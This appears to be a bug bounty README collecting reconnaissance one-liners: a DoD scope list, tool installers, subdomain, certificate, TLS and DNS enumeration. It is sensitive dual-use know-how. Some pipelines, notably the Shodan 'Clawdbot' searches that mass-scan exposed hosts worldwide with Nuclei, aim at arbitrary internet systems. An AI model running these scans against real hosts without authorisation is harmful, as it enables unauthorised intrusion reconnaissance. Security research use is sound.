Full DoD Scope - 19 Domains

# BBRF Scope - All DoD Domains
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'

| Military Branches | DoD Agencies | Support Commands |
|---|---|---|
| *.af.mil - Air Force | *.pentagon.mil - Pentagon HQ | *.dtic.mil - Tech Info Center |
| *.army.mil - Army | *.osd.mil - Office of SecDef | *.dau.mil - Acquisition Univ |
| *.marines.mil - Marines | *.disa.mil - Defense Info Systems | *.health.mil - Military Health |
| *.navy.mil - Navy | *.dtra.mil - Threat Reduction | *.ng.mil - National Guard |
| *.spaceforce.mil - Space Force | *.dla.mil - Logistics Agency | *.uscg.mil - Coast Guard |
| *.ussf.mil - Space Force | *.dcma.mil - Contract Management | *.socom.mil - Special Operations |
This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.
📋 Click to read our Security Policy & Guidelines
- ✅ Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
- ✅ Authorized Penetration Testing - With written permission
- ✅ Personal Lab Environments - Your own infrastructure
- ✅ Educational Purposes - Learning and research
- ✅ DoD VDP Program - Following program rules
- ❌ Unauthorized Testing - Testing without explicit permission
- ❌ Malicious Intent - Using techniques for harm or theft
- ❌ Out-of-Scope Testing - Testing targets outside program scope
- ❌ Social Engineering - Unless explicitly allowed in program
- ❌ DoS/DDoS Attacks - Resource exhaustion attacks
- Read the Program Policy - Always review scope and rules
- Test Safely - Don't cause harm to production systems
- Document Everything - Keep detailed notes of your findings
- Report Privately - Use official channels for disclosure
- Give Time to Fix - Allow vendors reasonable time to patch
- Be Professional - Maintain ethical standards
Found a security issue in this repository? Please report it responsibly:
Click to expand navigation
| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2026 | CVE-2026 exploits & techniques |
| Oneliners 2024-2025 | Previous techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |
🎯 MISSION STATEMENT

- Share elite bug bounty techniques from world-class hunters
- Build the most comprehensive one-liner collection
- Empower the security research community
Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and exploitable vulnerabilities. We aim to educate the community with powerful one-liner techniques for better understanding and faster results.
- Curated Commands - Battle-tested from real hunters
- Full Methodology - Recon to exploitation
- Constantly Updated - New techniques weekly
- Community Driven - Top hunters worldwide
📊 Click to see detailed statistics

| Category | Count | Status |
|---|---|---|
| One-Liners | 400+ | ✅ Active |
| Techniques | 50+ | ✅ Active |
| Tools Covered | 100+ | ✅ Active |
| CVE Examples | 20+ | ✅ Active |
| DoD Domains | 19 | ✅ Active |
| Contributors | Growing | 📈 Growing |
| Last Update | 2026 | ✅ Current |
# Step 1: Install essential tools (ProjectDiscovery Suite)
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Step 2: Run your first reconnaissance chain
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# Step 3: Analyze results and profit!
# Check the output for vulnerabilities and start reporting!

💬 Want a complete automated workflow? Click here!
# π Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"
# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt
# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt
# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt
# Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

| Tip | Description |
|---|---|
| 🔒 | Always get proper authorization before testing |
| 📝 | Keep detailed notes of your findings |
| 🛠️ | Start with automated tools, then manual testing |
| 💰 | Focus on high-impact vulnerabilities first |
| 🤝 | Join the community and learn from others |
Click to expand complete tool list
| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| Cert Monitoring | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API Discovery | Arjun, x8, ParamSpider | pip install arjun |
| Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| Scope Management | BBRF | pip install bbrf |
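If only a subset of these tools is needed, a quick check-and-install loop can be built straight from the table above. A minimal sketch; the module paths come from the Installation column, and the selection of tools here is only illustrative:

# Verify a few core Go tools and install any that are missing (hedged helper).
declare -A tools=(
  [subfinder]="github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
  [httpx]="github.com/projectdiscovery/httpx/cmd/httpx@latest"
  [katana]="github.com/projectdiscovery/katana/cmd/katana@latest"
  [nuclei]="github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
  [dalfox]="github.com/hahwul/dalfox/v2@latest"
  [anew]="github.com/tomnomnom/anew@latest"
)
for bin in "${!tools[@]}"; do
  command -v "$bin" >/dev/null || go install -v "${tools[$bin]}"
done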
# Ubuntu/Debian
sudo apt update && sudo apt install -y \
jq \
curl \
wget \
git \
python3 \
python3-pip \
golang-go \
nmap \
masscan \
chromium-browser \
parallel \
whois \
dnsutils \
libpcap-dev \
build-essential
# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin
# Reload shell
source ~/.bashrc  # or source ~/.zshrc

#!/bin/bash
# One-click install for all Go tools
echo "[*] Installing Go tools..."
go_tools=(
# ProjectDiscovery
"github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
"github.com/projectdiscovery/httpx/cmd/httpx@latest"
"github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
"github.com/projectdiscovery/katana/cmd/katana@latest"
"github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
"github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
"github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
"github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
# Tomnomnom
"github.com/tomnomnom/waybackurls@latest"
"github.com/tomnomnom/anew@latest"
"github.com/tomnomnom/qsreplace@latest"
"github.com/tomnomnom/unfurl@latest"
"github.com/tomnomnom/gf@latest"
"github.com/tomnomnom/assetfinder@latest"
"github.com/tomnomnom/httprobe@latest"
# Fuzzing & Crawling
"github.com/ffuf/ffuf/v2@latest"
"github.com/jaeles-project/gospider@latest"
"github.com/hakluke/hakrawler@latest"
"github.com/hakluke/hakrevdns@latest"
# Security
"github.com/hahwul/dalfox/v2@latest"
"github.com/lc/gau/v2/cmd/gau@latest"
"github.com/lc/subjs@latest"
# Screenshots & Utils
"github.com/sensepost/gowitness@latest"
"github.com/d3mondev/puredns/v2@latest"
"github.com/j3ssie/metabigor@latest"
"github.com/Emoe/kxss@latest"
"github.com/ferreiraklet/airixss@latest"
"github.com/edoardottt/cariddi/cmd/cariddi@latest"
"github.com/trufflesecurity/trufflehog/v3@latest"
)
for tool in "${go_tools[@]}"; do
echo "[+] Installing $tool"
go install -v "$tool" 2>/dev/null
done
echo "[β] Go tools installed!"#!/bin/bash
# One-click install for all Python tools
echo "[*] Installing Python tools..."
pip3 install --upgrade pip
pip3 install \
certstream \
sqlmap \
ghauri \
uro \
arjun \
paramspider \
shodan \
censys \
bbrf \
dnsgen \
waymore \
xsstrike \
s3scanner \
cloud_enum \
trufflehog
echo "[β] Python tools installed!"#!/bin/bash
# Install Feroxbuster (Rust)
echo "[*] Installing Rust tools..."
# Install Rust if not present
if ! command -v cargo &> /dev/null; then
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source $HOME/.cargo/env
fi
# Install Feroxbuster
cargo install feroxbuster
echo "[β] Rust tools installed!"#!/bin/bash
# Install tools that require cloning
echo "[*] Installing external tools..."
TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR
# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..
# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..
# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/
# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..
# Amass
go install -v github.com/owasp-amass/amass/v4/...@master
# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/
echo "[β] External tools installed!"#!/bin/bash
# MASTER INSTALLER - Run all installation scripts
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo "β KingOfBugBounty - Complete Tool Installation β"
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential
# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc
# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master
# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore
# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source $HOME/.cargo/env
fi
cargo install feroxbuster
# Update Nuclei templates
nuclei -update-templates
echo ""
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo "β β Installation Complete! β"
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"#!/bin/bash
# Install essential wordlists
WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR
# SecLists
git clone https://github.com/danielmiessler/SecLists.git
# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH
# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git
# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt
echo "[β] Wordlists installed in $WORDLIST_DIR"#!/bin/bash
# Verify all tools are installed
echo "Checking installed tools..."
tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")
for tool in "${tools[@]}"; do
if command -v $tool &> /dev/null; then
echo "[β] $tool"
else
echo "[β] $tool - NOT FOUND"
fi
done

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

⚠️ ENUMERATE EVERYTHING ⚠️

# ⚠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

# ⚠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

# ⚠️ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

# ⚠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

# ⚠️ Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

# ⚠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

# ⚠️ Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

# ⚠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

# ⚠️ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

# ⚠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

# ⚠️ Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

# ⚠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

# ⚠️ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

# ⚠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

# Locate Clawdbot servers exposed on the internet
shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt

# Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"

# Detect Clawdbot via User-Agent strings
shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt

# Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt

# Extract detailed server info from Clawdbot hosts
shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt

# Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt

# Find Clawdbot by country for geo-targeted testing
for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done

# Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt

# Extract Clawdbot hosts with SSL certificate info
shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt

# Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &

# ⚠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

# ⚠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt
# ⚠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt
# ⚠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt
# ⚠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt
# ⚠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

# ⚠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt# β οΈ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt# β οΈ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt# β οΈ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt# β οΈ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt# β οΈ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt# β οΈ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt# β οΈ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt# β οΈ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt# β οΈ THE ULTIMATE SUBDOMAIN HUNTER β οΈ
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

# ⚠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

# ⚠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

# ⚠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

# ⚠️ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

# ⚠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

TLS/SSL Certificate Intelligence with TLSX
# Full TLS certificate details extraction
echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

# Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

# Find hosts with expired SSL certificates
cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

# Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

# Find hosts with deprecated TLS versions (TLS 1.0/1.1)
cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

# JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

# Analyze certificate chain and identify CA
cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

# Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

# Find certificates where CN doesn't match the hostname
cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

# Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json

DNS Reconnaissance & Intelligence Gathering with DNSX
# Resolve subdomains and filter out wildcards
subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt

# Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt

# Find dangling CNAMEs pointing to vulnerable services
subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt

# Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt

# Extract MX records to identify mail servers and SPF bypass opportunities
cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt

# Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt

# Mass DNS brute-force with custom resolver list
cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt

# Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json

# Resolve domains, extract unique IPs, and identify ASN ownership
subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt

# Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"

🎯 Pro Tip: Use custom resolvers for better performance:
dnsx -r resolvers.txt -rl 1000
